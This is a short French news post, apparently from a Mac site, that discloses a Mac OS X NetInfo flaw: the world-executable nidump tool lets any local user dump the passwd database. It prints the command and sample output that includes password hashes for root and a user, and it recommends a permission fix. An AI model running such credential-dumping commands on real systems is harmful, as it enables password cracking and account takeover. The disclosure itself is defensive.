Actualité

Divers

Encore un trou béant !

Par Contributeur - Publié le

Dans la série failles de sécurité, en voici une autre liée à NetInfo.
Si je vous ai souvent parlé (en bien) de ce système je ne vous ai pas encore mentionné l'existence d'outils en ligne de commande permettant de manipuler la base de données.
En effet on peut tout à fait utiliser les utilitaires nidump, niload, niutil... situés dans /usr/bin en lieu et place de l'interface graphique fournie par NetInfo Manager.

Observons alors le mode de /usr/bin/nidump puisque c'est ce programme qui va nous intéresser:
ls -l /usr/bin/nidump
-r-xr-xr-x 1 root wheel 23996 Apr 13 14:03 /usr/bin/nidump

On remarque que par défaut, les droits d'execution sont attribués à tous les utilisateurs. Le moindre quidam peut donc effectuer la commande suivante:
nidump passwd .
nobody:*:-2:-2::0:0:Unprivileged User:/dev/null:/dev/null
root:Opv7qRKislTRA:0:0::0:0:System Administrator:/var/root:/bin/tcsh
daemon:*:1:1::0:0:System Services:/var/root:/dev/null
unknown:*:99:99::0:0:Unknown User:/dev/null:/dev/null
smmsp:*:25:25::0:0:Sendmail User:/private/etc/mail:/dev/null
www:*:70:70::0:0:World Wide Web Server:/Library/WebServer:/dev/null
mysql:*:74:74::0:0:MySQL Server:/dev/null:/dev/null
sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/dev/null
coco:9cu9PTxXUp7aI:501:20::0:0:Coco:/Users/coco:/bin/bash
marie::502:20::0:0:Marie:/Users/marie:/bin/tcsh
juju::503:20::0:0:Juju:/Users/juju:/bin/tcsh
ftp:*:21:-21::0:0:Anonymous:/Users/ftp:/dev/null
news:*:250:250::0:0:News Server:/dev/null:/dev/null
biales:XXXXXXX:507:20::0:0::/Users/Utilisateurs_ftp/biales:/bin/tcsh
grouik:XXXXXXX:508:20::0:0::/Users/Utilisateurs_ftp/grouik:/bin/tcsh
guest:XXXXXXX:509:20::0:0::/Users/Utilisateurs_ftp/guest:/bin/tcsh


Et voilà une sortie au format passwd typique. N'importe quel bon cracker peut ensuite se charger de trouver les mots de passe, le tout sans aucun privilège...
La solution de secours consiste donc à supprimer les droits d'execution pour les autres (mode 554).